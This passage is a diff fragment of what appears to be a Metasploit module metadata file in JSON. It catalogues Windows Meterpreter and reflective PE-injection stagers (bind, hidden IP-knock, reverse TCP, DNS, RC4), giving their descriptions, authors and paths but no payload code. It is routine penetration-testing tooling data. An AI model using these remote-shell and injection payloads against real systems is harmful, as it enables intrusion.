"rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/patchupmeterpreter/bind_hidden_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager", + "fullname": "payload/windows/patchupmeterpreter/bind_hidden_tcp", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/patchupmeterpreter/bind_ipv6_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/patchupmeterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + 
"stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/patchupmeterpreter/bind_ipv6_tcp_uuid": { + "name": "Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/patchupmeterpreter/bind_named_pipe": { + "name": "Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/patchupmeterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "UserExistsError" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + 
"is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/patchupmeterpreter/bind_nonx_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/patchupmeterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "vlad902 " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/patchupmeterpreter/bind_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/patchupmeterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": 
null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/patchupmeterpreter/bind_tcp_rc4": { + "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/patchupmeterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/patchupmeterpreter/bind_tcp_uuid": { + "name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/patchupmeterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL 
(staged).\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/patchupmeterpreter/find_tag": { + "name": "Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager", + "fullname": "payload/windows/patchupmeterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/patchupmeterpreter/reverse_ipv6_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/patchupmeterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": 
"payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/patchupmeterpreter/reverse_nonx_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/patchupmeterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "vlad902 " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/patchupmeterpreter/reverse_ord_tcp": { + "name": "Windows Meterpreter (skape/jt 
Injection), Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/patchupmeterpreter/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "spoonm " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/patchupmeterpreter/reverse_tcp": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager", + "fullname": "payload/windows/patchupmeterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": 
"windows/reverse_tcp" + }, + "payload_windows/patchupmeterpreter/reverse_tcp_allports": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager", + "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Inject the meterpreter server DLL (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/patchupmeterpreter/reverse_tcp_dns": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)", + "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "RageLtMan" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_tcp_dns", + "check": false, 
+ "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/patchupmeterpreter/reverse_tcp_rc4": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/patchupmeterpreter/reverse_tcp_rc4_dns": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/patchupmeterpreter/reverse_tcp_uuid": { + "name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/patchupmeterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "jt ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/patchupmeterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/peinject/bind_hidden_ipknock_tcp": { + "name": "Windows Inject PE Files, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/peinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + 
"description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\n\n Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode", + "references": [ + "URL-https://github.com/EgeBalci/Amber", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/peinject/bind_hidden_tcp": { + "name": "Windows Inject PE Files, Hidden Bind TCP Stager", + "fullname": "payload/windows/peinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Inject a custom native PE file into the 
exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/EgeBalci/Amber", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/peinject/bind_ipv6_tcp": { + "name": "Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. 
PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/peinject/bind_ipv6_tcp_uuid": { + "name": "Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/peinject/bind_named_pipe": { + "name": "Windows Inject PE Files, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "UserExistsError" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/peinject/bind_nonx_tcp": { + "name": "Windows Inject PE Files, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/peinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "vlad902 " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/peinject/bind_tcp": { + "name": "Windows Inject PE Files, Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/peinject/bind_tcp_rc4": { + "name": "Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. 
Also PE files which use resource loading might crash.\nListen for a connection", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/peinject/bind_tcp_uuid": { + "name": "Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded 